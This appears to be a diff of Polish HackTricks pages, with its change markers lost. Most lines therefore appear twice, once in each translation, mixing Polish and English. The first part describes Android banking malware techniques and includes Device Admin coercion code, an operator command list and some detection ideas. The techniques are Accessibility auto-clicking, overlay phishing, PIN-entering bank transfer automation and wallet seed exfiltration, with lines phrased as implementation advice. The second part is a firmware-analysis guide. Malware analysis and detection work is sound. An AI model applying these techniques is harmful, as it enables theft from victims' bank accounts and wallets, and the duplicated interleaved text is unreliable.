Stage-2 otwiera WebView, który hostuje stronę “Access”. Jej przycisk wywołuje eksportowaną metodę, która przenosi ofiarę do ustawień Accessibility i prosi o włączenie złośliwej usługi. Po przyznaniu, malware używa Accessibility do automatycznego klikania w kolejnych oknach dialogowych z uprawnieniami w czasie działania (contacts, overlay, manage system settings, etc.) i żąda Device Admin.
- Accessibility programowo pomaga zaakceptować późniejsze monity, znajdując w drzewie węzłów przyciski takie jak “Allow”/“OK” i wysyłając kliknięcia.
- Overlay permission check/request:
- Accessibility programowo pomaga zaakceptować późniejsze monity, znajdując przyciski takie jak “Allow”/“OK” w drzewie węzłów i wykonując kliknięcia.
- Sprawdzenie/żądanie uprawnienia overlay:
```java
if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
@ -271,17 +311,17 @@ Zobacz także:
### Overlay phishing/ransom via WebView
Operatorzy mogą wydawać polecenia, aby:
- wyświetlić nakładkę na cały ekran z URL, lub
- przekazać inline HTML, które zostanie załadowane do nakładki WebView.
- wyświetlić full-screen overlay z URL, lub
- przekazać inline HTML, które jest ładowane do WebView overlay.
Prawdopodobne zastosowania: coercion (wprowadzenie PIN), otwieranie wallet w celu przechwycenia PIN-ów, wiadomości z żądaniem okupu. Zachowaj polecenie, które sprawdzi i wymusi nadanie uprawnienia do nakładek, jeśli go brakuje.
Prawdopodobne zastosowania: wymuszenie (PIN entry), otwarcie wallet w celu przechwycenia PIN-ów, wiadomości żądające okupu. Zachowaj polecenie, które upewni się, że overlay permission jest przyznane, jeśli go brakuje.
### Remote control model text pseudo-screen + screen-cast
- Low-bandwidth: okresowo zrzucać drzewo węzłów Accessibility, serializować widoczne teksty/role/bounds i wysyłać do C2 jako pseudo-ekran (polecenia takie jak `txt_screen` jednorazowo i `screen_live` ciągłe).
- High-fidelity: zażądać MediaProjection i rozpocząć strumieniowanie/nagrywanie ekranu na żądanie (polecenia takie jak `display` / `record`).
- Low-bandwidth: okresowo zrzucać drzewo Accessibility node, serializować widoczne teksty/role/bounds i wysyłać do C2 jako pseudo-ekran (polecenia takie jak `txt_screen` jednorazowo i `screen_live` ciągłe).
- High-fidelity: żądać MediaProjection i rozpocząć screen-casting/recording na żądanie (polecenia takie jak `display` / `record`).
### ATS playbook (bank app automation)
Mając zadanie w formacie JSON, otwórz aplikację bankową, steruj UI przez Accessibility używając mieszanki zapytań tekstowych i stuknięć po współrzędnych, oraz wprowadź payment PIN ofiary, gdy zostanie poproszony.
Mając zadanie w JSON, otwórz aplikację bankową, steruj UI przez Accessibility mieszanką zapytań tekstowych i stuknięć po współrzędnych, i wprowadź PIN płatności ofiary, gdy zostanie poproszony.
Przykładowe zadanie:
```json
@ -293,7 +333,7 @@ Przykładowe zadanie:
"name": "ACME"
}
```
Example texts seen in one target flow (CZ → EN):
Przykładowe teksty widziane w jednym flow celu (CZ → EN):
- "Nová platba" → "Nowa płatność"
- "Zadat platbu" → "Wprowadź płatność"
- "Nový příjemce" → "Nowy odbiorca"
@ -304,60 +344,63 @@ Example texts seen in one target flow (CZ → EN):
- "Zaplatit" → "Zapłać"
- "Hotovo" → "Gotowe"
Operatorzy mogą również sprawdzać/podwyższać limity przelewów za pomocą komend takich jak `check_limit` i `limit`, które w podobny sposób nawigują po limits UI.
Operatorzy mogą także sprawdzać/podnosić limity przelewów za pomocą poleceń takich jak `check_limit` i `limit`, które poruszają się po interfejsie limitów w podobny sposób.
### Crypto wallet seed extraction
Targets like MetaMask, Trust Wallet, Blockchain.com, Phantom. Flow: unlock (stolen PIN or provided password), navigate to Security/Recovery, reveal/show seed phrase, keylog/exfiltrate it. Implement locale-aware selectors (EN/RU/CZ/SK) to stabilise navigation across languages.
Cele takie jak MetaMask, Trust Wallet, Blockchain.com, Phantom. Przebieg: unlock (skradziony PIN lub dostarczone hasło), navigate to Security/Recovery, reveal/show seed phrase, keylog/exfiltrate it. Zaimplementuj selektory uwzględniające lokalizację (EN/RU/CZ/SK), aby ustabilizować nawigację w różnych językach.
### Device Admin coercion
Device Admin APIs są używane do zwiększenia możliwości przechwytywania PIN oraz zniechęcenia ofiary:
Device Admin APIs są wykorzystywane do zwiększenia możliwości PIN-capture i frustrowania ofiary:
- Natychmiastowa blokada:
- Natychmiastowe zablokowanie:
```java
dpm.lockNow();
```
- Wygaszenie bieżącego poświadczenia w celu wymuszenia zmiany (Accessibility przechwytuje nowy PIN/hasło):
- Wygasić bieżące poświadczenie, aby wymusić zmianę (Accessibility przechwytuje nowy PIN/password):
```java
dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner
```
- Wymuś odblokowanie bez biometrii, wyłączając funkcje biometryczne keyguard:
- Wymuś odblokowanie bez użycia biometrii, wyłączając funkcje biometryczne keyguard:
```java
dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);
```
Uwaga: Wiele kontroli DevicePolicyManager wymaga Device Owner/Profile Owner na nowszych Android; niektóre buildy OEM mogą być luźne. Zawsze weryfikuj na docelowym OS/OEM.
Uwaga: Wiele kontroli DevicePolicyManager wymaga Device Owner/Profile Owner na nowszych wersjach Android; niektóre buildy OEM mogą być mniej rygorystyczne. Zawsze weryfikuj na docelowym OS/OEM.
### NFC relay orchestration (NFSkate)
Stage-3 może zainstalować i uruchomić zewnętrzny moduł NFC-relay (np. NFSkate) i nawet przekazać mu szablon HTML, który poprowadzi ofiarę podczas relay. To umożliwia bezstykowe card-present cash-out obok online ATS.
Stage-3 może zainstalować i uruchomić zewnętrzny moduł relay NFC (np. NFSkate) i nawet przekazać mu szablon HTML, aby poprowadzić ofiarę podczas relaya. To umożliwia bezdotykowy cash-out z kartą obecną przy terminalu równolegle z online ATS.
Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay).
Tło: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay).
### Operator command set (sample)
### Zestaw poleceń operatora (przykład)
- UI/stan: `txt_screen`, `screen_live`, `display`, `record`
- Społeczne: `send_push`, `Facebook`, `WhatsApp`
- Społecznościowe: `send_push`, `Facebook`, `WhatsApp`
- Nakładki: `overlay` (inline HTML), `block` (URL), `block_off`, `access_tint`
- Portfele: `metamask`, `trust`, `blockchain`, `phantom`
- ATS: `transfer`, `check_limit`, `limit`
- Urządzenie: `lock`, `expire_password`, `disable_keyguard`, `home`, `back`, `recents`, `power`, `touch`, `swipe`, `keypad`, `tint`, `sound_mode`, `set_sound`
- Komunikacja/rozpoznanie: `update_device`, `send_sms`, `replace_buffer`, `get_name`, `add_contact`
- Łączność/Recon: `update_device`, `send_sms`, `replace_buffer`, `get_name`, `add_contact`
- NFC: `nfs`, `nfs_inject`
### Detection & defence ideas (RatOn-style)
- Szukaj WebViewów z `addJavascriptInterface()` ujawniającymi metody instalatora/uprawnień; strony kończące się na “/access”, które wywołują monity Accessibility.
- Generuj alerty dla aplikacji, które generują dużą liczbę gestów/kliknięć Accessibility krótko po przyznaniu dostępu do usługi; telemetria przypominająca zrzuty węzłów Accessibility wysyłana do C2.
- Monitoruj zmiany polityki Device Admin w niezastrzeżonych aplikacjach: `lockNow`, wygasanie haseł, przełączniki funkcji keyguard.
- Alarmuj przy monitach MediaProjection z aplikacji niekorporacyjnych, po których następują okresowe przesyły ramek.
- Wykrywaj instalację/uruchomienie zewnętrznej aplikacji NFC-relay wywołanej przez inną aplikację.
- Dla bankowości: egzekwuj potwierdzenia poza kanałem, powiązanie z biometrią oraz limity transakcji odporne na automatyzację na urządzeniu.
### Pomysły wykrywania i obrony (w stylu RatOn)
- Szukaj WebViews z `addJavascriptInterface()` ujawniającymi metody instalatora/pozwoleń; stron kończących się na “/access”, które wywołują monity Accessibility.
- Generuj alerty dla aplikacji, które wkrótce po uzyskaniu dostępu do usługi wykonują gesty/kliknięcia Accessibility o dużej częstotliwości; telemetria przypominająca zrzuty węzłów Accessibility wysyłana do C2.
- Monitoruj zmiany polityk Device Admin w nieufnych aplikacjach: `lockNow`, wygaśnięcie hasła, przełączniki funkcji keyguard.
- Alertuj o monitach MediaProjection pochodzących z aplikacji niekorporacyjnych, którym towarzyszą okresowe przesyły klatek.
- Wykrywaj instalację/uruchomienie zewnętrznej aplikacji relay NFC wyzwolonej przez inną aplikację.
- Dla bankowości: egzekwuj potwierdzenia poza pasmem (out-of-band), powiązanie z biometrią oraz limity transakcji odporne na automatyzację na urządzeniu.
## References
## Referencje
- [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
- [Luban Android image compression library](https://github.com/Curzibn/Luban)
- [Mroczna strona romansu: kampania wymuszeń SarangTrap](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
- [Luban biblioteka kompresji obrazów dla Android](https://github.com/Curzibn/Luban)
- [Android Malware Promises Energy Subsidy to Steal Financial Data (McAfee Labs)](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-promises-energy-subsidy-to-steal-financial-data/)
- [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging)
- [Firebase Cloud Messaging — Dokumentacja](https://firebase.google.com/docs/cloud-messaging)
- [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
- [GhostTap/NFSkate NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
- [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/)
- [DomainTools SecuritySnacks ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN)
- [Socket.IO](https://socket.io)
{{#include ../../banners/hacktricks-training.md}}

217
src/hardware-physical-access/firmware-analysis/README.md
View File

@ -1,4 +1,4 @@
# Analiza oprogramowania układowego
# Firmware Analysis
{{#include ../../banners/hacktricks-training.md}}
@ -6,46 +6,52 @@
### Powiązane zasoby
{{#ref}}
synology-encrypted-archive-decryption.md
{{#endref}}
Oprogramowanie układowe to niezbędne oprogramowanie, które umożliwia urządzeniom prawidłowe działanie, zarządzając i ułatwiając komunikację między komponentami sprzętowymi a oprogramowaniem, z którym użytkownicy wchodzą w interakcję. Jest przechowywane w pamięci trwałej, co zapewnia, że urządzenie może uzyskać dostęp do istotnych instrukcji od momentu włączenia, co prowadzi do uruchomienia systemu operacyjnego. Badanie i potencjalna modyfikacja oprogramowania układowego to kluczowy krok w identyfikacji luk w zabezpieczeniach.
{{#ref}}
../../network-services-pentesting/32100-udp-pentesting-pppp-cs2-p2p-cameras.md
{{#endref}}
Firmware to podstawowe oprogramowanie, które umożliwia urządzeniom prawidłowe działanie poprzez zarządzanie i ułatwianie komunikacji między komponentami hardware a oprogramowaniem, z którego korzystają użytkownicy. Jest przechowywane w pamięci stałej, co zapewnia urządzeniu dostęp do kluczowych instrukcji od momentu włączenia, prowadząc do uruchomienia systemu operacyjnego. Analiza i ewentualna modyfikacja firmware'u to krytyczny krok w identyfikowaniu luk bezpieczeństwa.
## **Zbieranie informacji**
**Zbieranie informacji** to kluczowy początkowy krok w zrozumieniu budowy urządzenia i technologii, które wykorzystuje. Proces ten obejmuje gromadzenie danych na temat:
**Zbieranie informacji** to istotny początkowy etap zrozumienia składu urządzenia i technologii, których używa. Proces ten obejmuje gromadzenie danych o:
- Architektury CPU i systemu operacyjnego, na którym działa
- Szczegółów bootloadera
- Układu sprzętowego i kart katalogowych
- Metryk bazy kodu i lokalizacji źródłowych
- Zewnętrznych bibliotek i typów licencji
- Historii aktualizacji i certyfikatów regulacyjnych
- Diagramów architektonicznych i przepływów
- Oceny bezpieczeństwa i zidentyfikowanych luk
- architekturze CPU i systemie operacyjnym, na którym działa
- szczegółach bootloadera
- układzie hardware i datasheetach
- metrykach codebase i lokalizacjach źródeł
- zewnętrznych bibliotekach i typach licencji
- historiach aktualizacji i certyfikacjach regulacyjnych
- diagramach architektury i przepływów
- ocenach bezpieczeństwa i zidentyfikowanych podatnościach
W tym celu narzędzia **inteligencji źródeł otwartych (OSINT)** są nieocenione, podobnie jak analiza wszelkich dostępnych komponentów oprogramowania open-source poprzez ręczne i zautomatyzowane procesy przeglądowe. Narzędzia takie jak [Coverity Scan](https://scan.coverity.com) i [Semmles LGTM](https://lgtm.com/#explore) oferują darmową analizę statyczną, która może być wykorzystana do znalezienia potencjalnych problemów.
Do tego celu narzędzia **OSINT** są nieocenione, podobnie jak analiza dostępnych komponentów open-source zarówno ręcznie, jak i automatycznie. Narzędzia takie jak [Coverity Scan](https://scan.coverity.com) i [Semmles LGTM](https://lgtm.com/#explore) oferują darmową analizę statyczną, którą można wykorzystać do znalezienia potencjalnych problemów.
## **Pozyskiwanie oprogramowania układowego**
## **Pozyskiwanie firmware'u**
Pozyskiwanie oprogramowania układowego można podejść na różne sposoby, z których każdy ma swój poziom złożoności:
Pozyskanie firmware'u można realizować na różne sposoby, z różnym stopniem trudności:
- **Bezpośrednio** od źródła (deweloperzy, producenci)
- **Budując** je na podstawie dostarczonych instrukcji
- **Pobierając** z oficjalnych stron wsparcia
- Wykorzystując zapytania **Google dork** do znajdowania hostowanych plików oprogramowania układowego
- Uzyskując dostęp do **chmury** bezpośrednio, z narzędziami takimi jak [S3Scanner](https://github.com/sa7mon/S3Scanner)
- Przechwytując **aktualizacje** za pomocą technik man-in-the-middle
- **Ekstrahując** z urządzenia przez połączenia takie jak **UART**, **JTAG** lub **PICit**
- **Podsłuchując** żądania aktualizacji w komunikacji urządzenia
- Identyfikując i używając **twardo zakodowanych punktów końcowych aktualizacji**
- **Zrzucając** z bootloadera lub sieci
- **Usuwając i odczytując** chip pamięci, gdy wszystko inne zawiedzie, używając odpowiednich narzędzi sprzętowych
- **Budując** go z dostarczonych instrukcji
- **Pobierając** ze stron wsparcia producenta
- Wykorzystując zapytania **Google dork** do znajdywania hostowanych plików firmware
- Dostęp do **cloud storage** bezpośrednio, za pomocą narzędzi takich jak [S3Scanner](https://github.com/sa7mon/S3Scanner)
- Przechwytywanie **updates** metodami man-in-the-middle
- **Extracting** z urządzenia przez połączenia takie jak **UART**, **JTAG**, lub **PICit**
- **Sniffing** zapytań o aktualizacje w komunikacji urządzenia
- Identyfikacja i użycie **hardcoded update endpoints**
- **Dumping** z bootloadera lub przez sieć
- **Usunięcie i odczyt** pamięci masowej (storage chip), gdy wszystkie inne metody zawiodą, przy użyciu odpowiednich narzędzi hardware
## Analiza oprogramowania układowego
## Analiza firmware
Teraz, gdy **masz oprogramowanie układowe**, musisz wyodrębnić informacje na jego temat, aby wiedzieć, jak je traktować. Różne narzędzia, które możesz użyć do tego:
Teraz, gdy **masz firmware**, musisz wydobyć z niego informacje, aby wiedzieć, jak go traktować. Różne narzędzia, których możesz użyć do tego:
```bash
file <bin>
strings -n8 <bin>
@ -54,24 +60,25 @@ hexdump -C -n 512 <bin> > hexdump.out
hexdump -C <bin> | head # might find signatures in header
fdisk -lu <bin> #lists a drives partition and filesystems if multiple
```
Jeśli nie znajdziesz wiele za pomocą tych narzędzi, sprawdź **entropię** obrazu za pomocą `binwalk -E <bin>`, jeśli entropia jest niska, to prawdopodobnie nie jest zaszyfrowany. Jeśli entropia jest wysoka, prawdopodobnie jest zaszyfrowany (lub skompresowany w jakiś sposób).
Jeśli nie znajdziesz wiele przy pomocy tych narzędzi, sprawdź **entropy** obrazu za pomocą `binwalk -E <bin>` — jeśli entropy jest niskie, to prawdopodobnie nie jest zaszyfrowany. Jeśli entropy jest wysokie, najprawdopodobniej jest zaszyfrowany (lub w jakiś sposób skompresowany).
Ponadto możesz użyć tych narzędzi do wyodrębnienia **plików osadzonych wewnątrz firmware**:
Ponadto możesz użyć tych narzędzi do wyodrębnienia **plików osadzonych w firmware**:
{{#ref}}
../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
{{#endref}}
Lub [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)), aby zbadać plik.
Or [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) to inspect the file.
### Uzyskiwanie systemu plików
### Pozyskiwanie systemu plików
Za pomocą wcześniej wspomnianych narzędzi, takich jak `binwalk -ev <bin>`, powinieneś być w stanie **wyodrębnić system plików**.\
Binwalk zazwyczaj wyodrębnia go w **folderze nazwanym zgodnie z typem systemu plików**, który zazwyczaj jest jednym z następujących: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs.
Dzięki wcześniejszym wspomnianym narzędziom, takim jak `binwalk -ev <bin>`, powinieneś być w stanie **wyodrębnić system plików**.\
Binwalk zwykle wyodrębnia go wewnątrz **folderu nazwanego według typu systemu plików**, który zazwyczaj jest jednym z następujących: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs.
#### Ręczne wyodrębnianie systemu plików
Czasami binwalk **nie będzie miał magicznego bajtu systemu plików w swoich sygnaturach**. W takich przypadkach użyj binwalk, aby **znaleźć offset systemu plików i wyciąć skompresowany system plików** z binarnego i **ręcznie wyodrębnić** system plików zgodnie z jego typem, korzystając z poniższych kroków.
Czasami binwalk **nie znajdzie magic byte systemu plików w swoich sygnaturach**. W takich przypadkach użyj binwalk, aby **znaleźć offset systemu plików i wyodrębnić (carve) skompresowany system plików** z binarki oraz **ręcznie wyodrębnić** system plików zgodnie z jego typem, korzystając z poniższych kroków.
```
$ binwalk DIR850L_REVB.bin
@ -93,17 +100,17 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
8257536 bytes (8.3 MB, 7.9 MiB) copied, 12.5777 s, 657 kB/s
```
Alternatywnie, można również uruchomić następujące polecenie.
Alternatywnie można uruchomić także następujące polecenie.
`$ dd if=DIR850L_REVB.bin bs=1 skip=$((0x1A0094)) of=dir.squashfs`
- Dla squashfs (używanego w powyższym przykładzie)
- Dla squashfs (użytego w przykładzie powyżej)
`$ unsquashfs dir.squashfs`
Pliki będą w katalogu "`squashfs-root`" po tym.
Pliki będą znajdować się później w katalogu "`squashfs-root`".
- Pliki archiwum CPIO
- Dla archiwów CPIO
`$ cpio -ivd --no-absolute-filenames -F <bin>`
@ -111,19 +118,19 @@ Pliki będą w katalogu "`squashfs-root`" po tym.
`$ jefferson rootfsfile.jffs2`
- Dla systemów plików ubifs z pamięcią NAND flash
- Dla systemów plików ubifs z NAND flash
`$ ubireader_extract_images -u UBI -s <start_offset> <bin>`
`$ ubidump.py <bin>`
## Analiza Oprogramowania Układowego
## Analiza Firmware
Gdy oprogramowanie układowe jest już zdobyte, istotne jest jego rozłożenie na części w celu zrozumienia jego struktury i potencjalnych luk. Proces ten polega na wykorzystaniu różnych narzędzi do analizy i wydobywania cennych danych z obrazu oprogramowania układowego.
Po uzyskaniu firmware ważne jest jego rozebranie, aby zrozumieć strukturę i potencjalne podatności. Proces ten polega na użyciu różnych narzędzi do analizy i wyodrębniania cennych danych z obrazu firmware.
### Narzędzia do Wstępnej Analizy
### Narzędzia do analizy wstępnej
Zestaw poleceń jest dostarczany do wstępnej inspekcji pliku binarnego (nazywanego `<bin>`). Te polecenia pomagają w identyfikacji typów plików, wydobywaniu ciągów, analizie danych binarnych oraz zrozumieniu szczegółów partycji i systemu plików:
Poniżej podano zestaw poleceń do wstępnej inspekcji pliku binarnego (nazywanego `<bin>`). Polecenia te pomagają w identyfikacji typów plików, wydobywaniu ciągów, analizie danych binarnych oraz zrozumieniu informacji o partycjach i systemach plików:
```bash
file <bin>
strings -n8 <bin>
@ -132,53 +139,53 @@ hexdump -C -n 512 <bin> > hexdump.out
hexdump -C <bin> | head #useful for finding signatures in the header
fdisk -lu <bin> #lists partitions and filesystems, if there are multiple
```
Aby ocenić status szyfrowania obrazu, sprawdzana jest **entropia** za pomocą `binwalk -E <bin>`. Niska entropia sugeruje brak szyfrowania, podczas gdy wysoka entropia wskazuje na możliwe szyfrowanie lub kompresję.
Aby ocenić stan szyfrowania obrazu, sprawdza się **entropię** za pomocą `binwalk -E <bin>`. Niska entropia sugeruje brak szyfrowania, podczas gdy wysoka entropia może wskazywać na możliwe szyfrowanie lub kompresję.
Do ekstrakcji **osadzonych plików** zaleca się korzystanie z dokumentacji **file-data-carving-recovery-tools** oraz **binvis.io** do inspekcji plików.
Dla wyodrębniania **osadzonych plików** zalecane są narzędzia i zasoby takie jak dokumentacja **file-data-carving-recovery-tools** oraz **binvis.io** do inspekcji plików.
### Ekstrakcja systemu plików
### Wyodrębnianie systemu plików
Używając `binwalk -ev <bin>`, można zazwyczaj wyodrębnić system plików, często do katalogu nazwanego na cześć typu systemu plików (np. squashfs, ubifs). Jednak gdy **binwalk** nie rozpoznaje typu systemu plików z powodu brakujących bajtów magicznych, konieczna jest ręczna ekstrakcja. Polega to na użyciu `binwalk` do zlokalizowania offsetu systemu plików, a następnie polecenia `dd` do wyodrębnienia systemu plików:
Używając `binwalk -ev <bin>`, zwykle można wyodrębnić system plików, często do katalogu nazwanego według typu systemu plików (np. squashfs, ubifs). Jednak gdy **binwalk** nie rozpoznaje typu systemu plików z powodu brakujących magicznych bajtów, konieczne jest ręczne wyodrębnienie. Obejmuje to użycie `binwalk` do znalezienia offsetu systemu plików, a następnie polecenia `dd` do wydzielenia systemu plików:
```bash
$ binwalk DIR850L_REVB.bin
$ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
```
Po tym, w zależności od typu systemu plików (np. squashfs, cpio, jffs2, ubifs), używane są różne polecenia do ręcznego wyodrębnienia zawartości.
Następnie, w zależności od typu systemu plików (np. squashfs, cpio, jffs2, ubifs), używane są różne polecenia do ręcznego rozpakowania zawartości.
### Analiza systemu plików
### Filesystem Analysis
Po wyodrębnieniu systemu plików rozpoczyna się poszukiwanie luk w zabezpieczeniach. Zwraca się uwagę na niebezpieczne demony sieciowe, twardo zakodowane dane uwierzytelniające, punkty końcowe API, funkcjonalności serwera aktualizacji, niekompilowany kod, skrypty uruchamiające oraz skompilowane binaria do analizy offline.
Po wyodrębnieniu systemu plików rozpoczyna się poszukiwanie błędów bezpieczeństwa. Zwraca się uwagę na niebezpieczne demony sieciowe, zakodowane na stałe poświadczenia, API endpoints, funkcje serwera aktualizacji, niekompilowany kod, skrypty startowe oraz skompilowane binaria do analizy offline.
**Kluczowe lokalizacje** i **elementy** do sprawdzenia obejmują:
- **etc/shadow** i **etc/passwd** w celu uzyskania danych uwierzytelniających użytkowników
- Certyfikaty SSL i klucze w **etc/ssl**
- Pliki konfiguracyjne i skrypty w poszukiwaniu potencjalnych luk
- Wbudowane binaria do dalszej analizy
- Typowe serwery internetowe urządzeń IoT i binaria
- **etc/shadow** i **etc/passwd** pod kątem poświadczeń użytkowników
- certyfikaty SSL i klucze w **etc/ssl**
- pliki konfiguracyjne i skrypty pod kątem potencjalnych podatności
- osadzone binaria do dalszej analizy
- typowe web serwery i binaria urządzeń IoT
Kilka narzędzi pomaga w odkrywaniu wrażliwych informacji i luk w zabezpieczeniach w systemie plików:
Kilka narzędzi pomaga w wykrywaniu poufnych informacji i podatności w systemie plików:
- [**LinPEAS**](https://github.com/carlospolop/PEASS-ng) i [**Firmwalker**](https://github.com/craigz28/firmwalker) do wyszukiwania wrażliwych informacji
- [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT_core) do kompleksowej analizy oprogramowania układowego
- [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer), [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep), [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go) i [**EMBA**](https://github.com/e-m-b-a/emba) do analizy statycznej i dynamicznej
- [**LinPEAS**](https://github.com/carlospolop/PEASS-ng) oraz [**Firmwalker**](https://github.com/craigz28/firmwalker) do wyszukiwania wrażliwych informacji
- [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT_core) do kompleksowej analizy firmware
- [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer), [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep), [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go) oraz [**EMBA**](https://github.com/e-m-b-a/emba) do analizy statycznej i dynamicznej
### Kontrole bezpieczeństwa skompilowanych binariów
### Security Checks on Compiled Binaries
Zarówno kod źródłowy, jak i skompilowane binaria znalezione w systemie plików muszą być dokładnie sprawdzone pod kątem luk w zabezpieczeniach. Narzędzia takie jak **checksec.sh** dla binariów Unix i **PESecurity** dla binariów Windows pomagają zidentyfikować niechronione binaria, które mogą być wykorzystane.
Zarówno kod źródłowy, jak i skompilowane binaria znalezione w systemie plików muszą być sprawdzone pod kątem podatności. Narzędzia takie jak **checksec.sh** dla binariów Unix i **PESecurity** dla binariów Windows pomagają zidentyfikować niechronione binaria, które mogą być wykorzystane.
## Emulacja oprogramowania układowego do analizy dynamicznej
## Emulating Firmware for Dynamic Analysis
Proces emulacji oprogramowania układowego umożliwia **analizę dynamiczną** działania urządzenia lub pojedynczego programu. Podejście to może napotkać trudności związane z zależnościami sprzętowymi lub architektonicznymi, ale przeniesienie systemu plików root lub konkretnych binariów na urządzenie o dopasowanej architekturze i endianness, takie jak Raspberry Pi, lub na wstępnie zbudowaną maszynę wirtualną, może ułatwić dalsze testowanie.
Proces emulacji firmware umożliwia **analizę dynamiczną** działania urządzenia lub pojedynczego programu. Podejście to może napotkać problemy związane ze sprzętem lub zależnościami architektury, ale przeniesienie root filesystemu lub konkretnych binariów na urządzenie o zgodnej architekturze i kolejności bajtów (np. Raspberry Pi) lub na gotową maszynę wirtualną może ułatwić dalsze testy.
### Emulacja pojedynczych binariów
### Emulating Individual Binaries
Aby zbadać pojedyncze programy, kluczowe jest zidentyfikowanie endianness programu i architektury CPU.
Do badania pojedynczych programów kluczowe jest określenie kolejności bajtów (endianness) oraz architektury CPU programu.
#### Przykład z architekturą MIPS
#### Example with MIPS Architecture
Aby emulować binarium architektury MIPS, można użyć polecenia:
To emulate a MIPS architecture binary, one can use the command:
```bash
file ./squashfs-root/bin/busybox
```
@ -186,65 +193,65 @@ Aby zainstalować niezbędne narzędzia emulacyjne:
```bash
sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
```
Dla MIPS (big-endian) używa się `qemu-mips`, a dla binarnych little-endian wybór padnie na `qemu-mipsel`.
Dla MIPS (big-endian) używa się `qemu-mips`, a dla binariów little-endian wyborem będzie `qemu-mipsel`.
#### Emulacja architektury ARM
Dla binariów ARM proces jest podobny, z emulatorem `qemu-arm` wykorzystywanym do emulacji.
Dla binariów ARM proces jest podobny — do emulacji używa się `qemu-arm`.
### Pełna emulacja systemu
Narzędzia takie jak [Firmadyne](https://github.com/firmadyne/firmadyne), [Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit) i inne, ułatwiają pełną emulację firmware'u, automatyzując proces i wspierając analizę dynamiczną.
Narzędzia takie jak [Firmadyne](https://github.com/firmadyne/firmadyne), [Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit) i inne ułatwiają pełną emulację firmware, automatyzując proces i wspierając analizę dynamiczną.
## Analiza dynamiczna w praktyce
Na tym etapie używa się rzeczywistego lub emulowanego środowiska urządzenia do analizy. Ważne jest, aby utrzymać dostęp do powłoki systemu operacyjnego i systemu plików. Emulacja może nie idealnie odwzorowywać interakcje sprzętowe, co wymaga okazjonalnych restartów emulacji. Analiza powinna ponownie przeszukać system plików, wykorzystać wystawione strony internetowe i usługi sieciowe oraz zbadać luki w bootloaderze. Testy integralności firmware'u są kluczowe do identyfikacji potencjalnych luk backdoor.
Na tym etapie do analizy wykorzystuje się środowisko urządzenia rzeczywistego lub emulowanego. Ważne jest utrzymanie dostępu do shell do OS i filesystem. Emulacja może nie odzwierciedlać dokładnie interakcji z hardware, co może wymagać okazjonalnego restartu emulacji. Analiza powinna ponownie przeszukać filesystem, wykorzystać ujawnione webpages i network services oraz zbadać bootloader vulnerabilities. Testy integralności firmware są kluczowe do wykrycia potencjalnych backdoorów.
## Techniki analizy w czasie rzeczywistym
## Techniki analizy w czasie wykonywania
Analiza w czasie rzeczywistym polega na interakcji z procesem lub binariami w ich środowisku operacyjnym, przy użyciu narzędzi takich jak gdb-multiarch, Frida i Ghidra do ustawiania punktów przerwania i identyfikacji luk poprzez fuzzing i inne techniki.
Analiza w czasie wykonywania polega na interakcji z procesem lub binarium w jego środowisku wykonawczym, przy użyciu narzędzi takich jak gdb-multiarch, Frida i Ghidra do ustawiania breakpointów i identyfikowania podatności poprzez fuzzing i inne techniki.
## Eksploatacja binarna i dowód koncepcji
## Eksploatacja binarna i Proof-of-Concept
Opracowanie PoC dla zidentyfikowanych luk wymaga głębokiego zrozumienia architektury docelowej i programowania w językach niskiego poziomu. Ochrony w czasie rzeczywistym w systemach wbudowanych są rzadkie, ale gdy są obecne, techniki takie jak Return Oriented Programming (ROP) mogą być konieczne.
Opracowanie PoC dla wykrytych podatności wymaga głębokiego zrozumienia docelowej architektury i programowania w językach niskiego poziomu. Ochrony runtime binariów w systemach embedded są rzadkie, ale gdy występują, mogą być konieczne techniki takie jak Return Oriented Programming (ROP).
## Przygotowane systemy operacyjne do analizy firmware'u
## Gotowe systemy operacyjne do analizy firmware
